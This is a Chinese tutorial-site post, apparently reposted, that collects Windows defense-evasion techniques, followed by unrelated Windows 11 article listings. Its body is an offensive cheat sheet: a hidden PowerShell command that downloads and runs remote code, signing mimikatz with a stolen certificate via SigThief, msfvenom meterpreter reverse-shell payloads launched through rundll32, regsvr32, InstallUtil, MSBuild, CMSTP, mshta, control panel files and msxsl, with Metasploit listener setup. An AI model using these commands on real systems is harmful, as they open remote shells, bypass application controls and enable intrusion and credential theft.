小编分享Windows命令执行防御规避总结。

春天 • 2023-08-23 16:45 • windows11教程

今天小编为大家带来Windows命令执行防御规避总结，具体如下：

powershell

powershell.exe -nop -w hidden -c \“IEX （（new-object net.webclient）.downloadstring（‘https://xx.xx.xx.xx:8888/logo.gif’））\”“ /f

SIP

通过sip劫持对恶意代码签名获得系统信任https://github.com/secretsquirrel/SigThief

python sigthief.py -i consent.exe -t mimikatz.exe -o signed-mimikatz.exe

rundll32.exe

生成

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=4444 -f dll 》xxx.dll

目标执行

rundll32.exe shell32.dll，Control_RunDLL xxx.dll

Regsvr32.exe

msfconsole

auxiliary/server/regsvr32_command_delivery_server

set CMD net user test 123456 /add

目标执行

regsvr32 /s /n /u /i:https://xx.xx.xx.xx:8080/aPxOb0o scrobj.dll

InstallUtil.exe

1.编译后门：

C：\Windows\Microsoft.NET\Framework64\v4.0.30319》csc.exe /r:System.EnterpriseServices.dll /unsafe /target:library /out:xxx.exe /keyfile：”C：\Program Files （x86）\Microsoft SDKs\Windows\v10.0A\bin\NETFX 4.8 Tools\x64\key.snk“ xxx.cs

2.靶机上运行：

InstallUtil.exe /U xxx.exe

3.msf监听，得到反弹的shell：

set payload windows/x64/meterpreter/reverse_tcp

set LHOST xx.xx.xx.xx

set LPORT 4444

exploit

Msbuild.exe

MSBuild是Microsoft Build Engine的缩写，代表Microsoft和Visual Studio的新的生成平台，MSBuild可编译特定格式的xml文件

https://github.com/3gstudent/msbuild-inline-task

msf生成shellcode

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=xx.xx.xx.xx lport=4444

-f csharp

使用shellcode替换https://github.com/3gstudent/msbuild-inline-task/blob/master/executes%20x64%20shellcode.xml中的shellcode部分

msf监听

use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_tcp

set lhost xx.xx.xx.xx

set lport 4444

exploit

运行

C：\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe exec64.xml

CMSTP

cmstp.exe /s /ns C：\Users\administrator\AppData\Local\Temp\XKNqbpzl.txt绕过AppLocker并启动恶意脚本

Mshta.exe

Mshta.exe 是一个执行 Microsoft HTML 应用程序（HTA）的实用程序，攻击者可以使用 mshta.exe 通过受信任的 Windows 实用程序代理执行恶意代码

use exploit/windows/misc/hta_server

msf exploit（windows/misc/hta_server）》 set srvhost xx.xx.xx.xx

msf exploit（windows/misc/hta_server）》 exploit

mshta.exe https://xx.xx.xx.xx:8080/xxxxxxx.hta

控制面板

攻击者可以使用控制面板项作为有效载荷来执行任意命令，控制面板项是注册的可执行文件（.exe）或控制面板（.cpl）文件，可以直接从命令行执行或通过Control_RunDLL（API）调用或者直接双击文件。

攻击者构造恶意的dll文件CPIApplet.dll

利用msf生成dll文件：

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=170.170.64.17 LPORT=4444 -f dll 》 /tmp/CPIApplet.dll

传入windows机器，然后重命名为CPIApplet.cpl，通过control.exe c：\users\administrator\desktop\CPIApplet.cpl 执行命令

通过msxsl.exe调用恶意xml文件执行脚本

制作两个文件

customers.xml

script.xsl

xmlns:xsl=”https://www.w3.org/1999/XSL/Transform“

xmlns:msxsl=”urn:schemas-microsoft-com:xslt“

xmlns:user=”https://mycompany.com/mynamespace“》

function xml（nodelist） {

var r = new ActiveXObject（”WScript.Shell“）.Run（”cmd.exe /k calc.exe“）;

return nodelist.nextNode（）.xml;

}

开启http服务

python3 -m http.server 80

远程下载执行

msxsl.exe https://xx.xx.xx.xx/customers.xml https://xx.xx.xx.xx/scrip.xsl

本文来自网络投稿，来自作者春天。不代表酷牛教程立场，如若转载，请注明出处：https://www.xukn.com/1182731.html

春天

说说WSA-with-Magisk-GApps-Pico，1.8.32822.0安装方法。

上一篇 2023-08-23 16:45

教你Win11最新版本频繁提示许可信息即将过期怎么办。

下一篇 2023-08-23 16:45

小编教你Win11，22H2任务栏添加任务管理器怎么设置。

Win11 22H2任务栏添加任务管理器怎么设置？据了解Win11 22H2允许用户通过右键点击任务栏来快速打开任务管理器，但是这一功能还需自行开启，那么应该如何操作呢？我们可以试...

2023-08-25 • windows11教程
00140
Windows电脑屏幕倒过来了怎么办，Win11屏幕倒过来图文教程。

在我们使用电脑的过程中经常会遇到电脑出现各种各样的问题，尤其是升级了Win11系统的用户遇到的问题更多。因为Win11系统还是一款新的系统，出现更多的问题也很正常。当我们遇到Win...

2023-08-22 • windows11教程
00170
小编分享为什么Win11找不到WiFi网络。

为什么Win11找不到WiFi网络？许多用户在升级安装了最新的Windows11系统之后，发现自己的电脑无法搜索到WiFi网络，遇到这种情况我们应该怎么解决呢？下面小编就带着大家一...

2023-08-24 • windows11教程
00140
分享Win11如何将蓝牙设备连接PC，蓝牙设备连接PC方法教程。

相信很多用户已经更新了Win11系统了，在这个使用的过程中难免会出现一些大大小小的问题，比如一些最基础的蓝牙问题，关于蓝牙设备如何连接您的PC，下面小编就为大家带来这个问题的解决办...

2023-08-22 • windows11教程
00160
小编教你微星主板如何开启TPM2.0升级Win11，微星主板BIOS开启TPM2.0。

大家都知道想要安装Win11系统电脑需要支持TPM 2.0，但是有用户发现自己的新电脑提示不支持TPM 2.0，这是怎么回事？其实是TPM长期以来都没有什么实际作用，还会导致兼容问...

2023-08-23 • windows11教程
00170
教你Win11玩游戏突然没有声音怎么恢复。

近期有部分Win11用户反映，在玩游戏时电脑突然没有声音了，这样十分影响游戏体验，那么有没有什么方法可以恢复呢？如果你也有同样的困扰，不妨来看看下面这篇小编带来的详细的解决教程吧，...

2023-08-24 • windows11教程
00140
教你Win11怎么开启性能模式，Win11开启性能模式方法。

Win11怎么开启性能模式？为了让电脑发挥出最佳的性能的时候，我们需要开启性能模式，那么Win11系统能不能开启性能模式呢？要怎么设置才能让Win11发挥出最佳的性能呢？下面就来为...

2023-08-22 • windows11教程
00110
小编分享win11cpu占用率100%怎么解决，win11cpu占用率高的解决方法。

win11cpu占用率100%怎么解决？最近有小伙伴们询问小编关于自己win11系统的cpu占用率高甚至达到了100%不知道怎么去解决这个问题，想问问小编有没有什么解决方法。小伙伴...

2023-08-25 • windows11教程
00160
说说新买的笔记本电脑自带win11激活中如何跳过联网激活。

现在新的笔记本都自带win11，新机开机首次激活时需要联网，非常麻烦，因为联网后电脑就系统自动激活，自带office也激活了，导致在网购的电脑不能享受无理由退换货，还有就是联网激活...

2023-08-24 • windows11教程
00130
关于Win11小组件怎么设置，Win11小组件设置方法。

Win11小组件怎么设置？Win11系统带来了很多的全新功能和特色，尤其是全新的小组件功能可以让你的整个电脑变得更加的个性，但是很多用户不知道怎么设置，为此我们给大家带来了Win1...

2023-08-22 • windows11教程
00120
windows11教程

小编教你Win11资源管理器无限重启的解决方法。

更新win11后，资源管理器不断重启，屏幕不断闪烁，任务栏按钮消失，无法打开设置，相信不少用户在近期都遇到过这些问题，微软官方已经在第一时间发布了修复方法，下面一起来看看吧。微软...

2023-08-22
00160
windows11教程

聊聊下载适用于Android的Windows子系统时收到错误代码0x800700B7怎么办。

下载适用于Android的Windows子系统时收到错误代码0x800700B7怎么办？本文就为大家带来了详细的解决教程，感兴趣的朋友一起看看吧。重置Microsoft Stor...

2023-08-23
00130
经验分享Win11系统如何下载安卓APP，Win11系统下载安卓APP的操作步骤。

不少用户期待的Win11系统运行Android 的功能，微软终于开始启动了。于向Win11用户下载内测者提供预览版，并提供对 Amazon Appstore 的应用微软已经在Win...

2023-08-23 • windows11教程
00130
小编教你Win11预览体验计划怎么退出，退出Win11预览体验计划教程。

电脑都会推出系统预览体验计划，Win11系统也是如此。最近就有不少Win11用户跟小编反映自己想退出预览体验计划，但是不知道怎么退出。针对这个问题，小编就给大家讲讲Win11预览版...

2023-08-23 • windows11教程
00140
windows11教程

教你Win10任意版本绕过TPM限制,在线系统更新到Win11，22000.65的方法。

微软今天更新了最新的Win11 22000.65预览版，这次更新修复了众多的问题，其他大家关心的右键刷新和桌面任务也都恢复到了Win10，很多用户都想升级体验，但是不知道如何去升级...

2023-08-22
00190

发表回复

登录后才能评论

小编分享Windows命令执行防御规避总结。

相关推荐

发表回复